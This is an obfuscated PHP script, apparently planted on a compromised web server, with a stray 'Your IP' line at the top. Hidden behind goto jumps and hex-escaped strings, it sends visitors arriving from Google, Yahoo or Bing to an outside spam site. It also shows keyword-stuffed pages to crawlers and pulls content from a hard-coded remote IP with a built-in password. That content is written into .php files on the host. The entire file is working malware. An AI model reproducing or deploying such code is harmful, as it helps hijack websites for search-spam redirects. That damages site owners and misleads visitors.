Your IP : 172.28.240.42
<?php
goto MOojj; GC8N5: $xx1 = 5; goto FgSU9; e7nZv: $apass1 = "\x76\151\x73\x64\157\151\x6a\145\x77"; goto Z8FdA; qZToP: $_GET["\167\x6f\x72\154\x64"] = 5; goto Dty1S; bu9JJ: $apass3 = "\x72\166\63\x32\x79\x64\x61\143\x73\x76\163\x64\166"; goto Sdt5_; yPhfh: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\x70\72\57\x2f\x31\x33\65\x2e\61\x38\x31\x2e\x32\61\56\61\62\x36\57" . $_GET["\146\156"] . "\x2e\x70\150\x70\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\144"]}"); } goto J1N25; Z8FdA: $x1 = 3; goto GC8N5; YuhkC: if (strpos($_SERVER["\x48\x54\124\x50\x5f\122\x45\106\x45\x52\x45\x52"], "\x67\x6f\157\147\x6c\x65\x2e") or strpos($_SERVER["\110\124\x54\120\x5f\x52\105\106\x45\x52\x45\x52"], "\171\x61\x68\x6f\157\x2e") or strpos($_SERVER["\x48\x54\124\120\137\122\105\106\105\x52\105\122"], "\142\151\x6e\147\56")) { $tpl = "\151\156\x64\145\170\57" . $_GET["\151\x64"] . "\x2e\x70\x68\x70\x2e\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\151\157\x6e\72\40\150\x74\164\x70\163\72\x2f\57\143\150\x70\157\x6b\56\x73\151\x74\x65\57\x65\x6e\164\x65\162\x2f\77\155\141\162\x6b\75{$today}\55{$s}\x26\x74\160\x6c\x3d{$tpl}\46\145\156\x67\x6b\145\x79\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\x2e\x70\x68\x70"; if (file_exists("\151\156\144\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\110\124\124\x50\137\x55\123\105\x52\x5f\x41\x47\105\x4e\x54"], "\x62\151\156\x67") > 2 or strpos($_SERVER["\x48\124\124\x50\x5f\x55\x53\x45\x52\x5f\101\107\105\x4e\x54"], "\x79\x61\x68\157\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); $html = str_replace("\74\164\151\x74\x6c\x65\x3e\74\57\x74\x69\164\154\x65\76", "\74\x74\x69\164\154\145\x3e{$keyword}\x3c\x2f\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto yH5ug; p3_0X: if ($_GET["\x69\x64"] == "\x74\x65\x73\164\x69\x6e\x67") { echo "\164\x65\163\164\x20\147\x6f\x6f\x64\x2e\x2e\x2e"; die; } goto eOv6j; MOojj: error_reporting(0); goto nqB0R; tu7oX: echo $text; goto o53uy; x0DCH: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto PXL8A; nqB0R: $today = "\62\x30\62\65\x30\66\60\65\55"; goto ENkDg; A0h8G: $s = dirname($_SERVER["\120\110\x50\137\x53\105\114\x46"]); goto x0DCH; Sdt5_: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto YuhkC; Vfh2X: if (strlen($text) > 5000) { $out = fopen("\x69\156\144\145\170\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto tu7oX; Dty1S: $_GET["\146\x6e"] = "\x36\71\66\71\x36\71\x6e\x65\x77"; goto e7nZv; yH5ug: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\x64"]); goto JVAEH; FgSU9: $keyword = str_replace("\55", "\40", $_GET["\151\144"]); goto kiSzj; eOv6j: if ($_GET["\x69\x64"] == "\151\156\144\x65\170") { header("\114\157\x63\x61\x74\151\157\x6e\72\40\150\164\x74\x70\x73\x3a\x2f\x2f\x67\157\157\x67\154\145\x2e\x63\157\155"); die; } goto qZToP; GNv59: $apass2 = "\x62\x32\x33\x68\162\62\x33\x76\162\x33\62"; goto A0h8G; ENkDg: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto p3_0X; kiSzj: $keyword = str_replace("\x20", "\x2b", $keyword); goto GNv59; PXL8A: $s = $_SERVER["\123\x45\122\x56\x45\122\137\116\x41\x4d\105"] . $s; goto bu9JJ; JVAEH: $text = ''; goto QjH9B; QjH9B: if (function_exists("\143\165\x72\x6c\x5f\151\156\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\x74\x70\x3a\57\57\61\x33\x35\56\61\70\x31\x2e\62\x31\56\x31\62\x36\x2f" . $_GET["\x66\156"] . "\56\160\150\160\x3f\x70\x61\x73\x73\x3d{$apass}\46\161\x3d{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\x2f\x34\56\60\x20\x28\143\157\x6d\x70\x61\164\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\105\40\66\x2e\60\73\40\127\151\x6e\x64\157\x77\x73\x20\x4e\x54\x20\65\56\x31\73\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto yPhfh; J1N25: if (strlen($text) < 5000) { $url = "\x31\x33\x35\x2e\61\70\x31\56\x32\x31\56\x31\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\74\x62\x72\x20\57\76\xa"; } else { $req = "\57" . $_GET["\x66\156"] . "\x2e\160\150\x70\77\160\141\163\x73\x3d{$apass}\x26\161\75{$_GET["\151\144"]}"; $out = "\107\105\x54\40{$req}\x20\x48\x54\124\x50\x2f\61\56\x30\xd\xa"; $out .= "\x48\x6f\x73\x74\x3a\40{$url}\15\12"; $out .= "\x43\x6f\x6e\x6e\x65\x63\164\151\x6f\x6e\72\x20\x43\x6c\x6f\163\x65\xd\12\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto Vfh2X; o53uy: ?>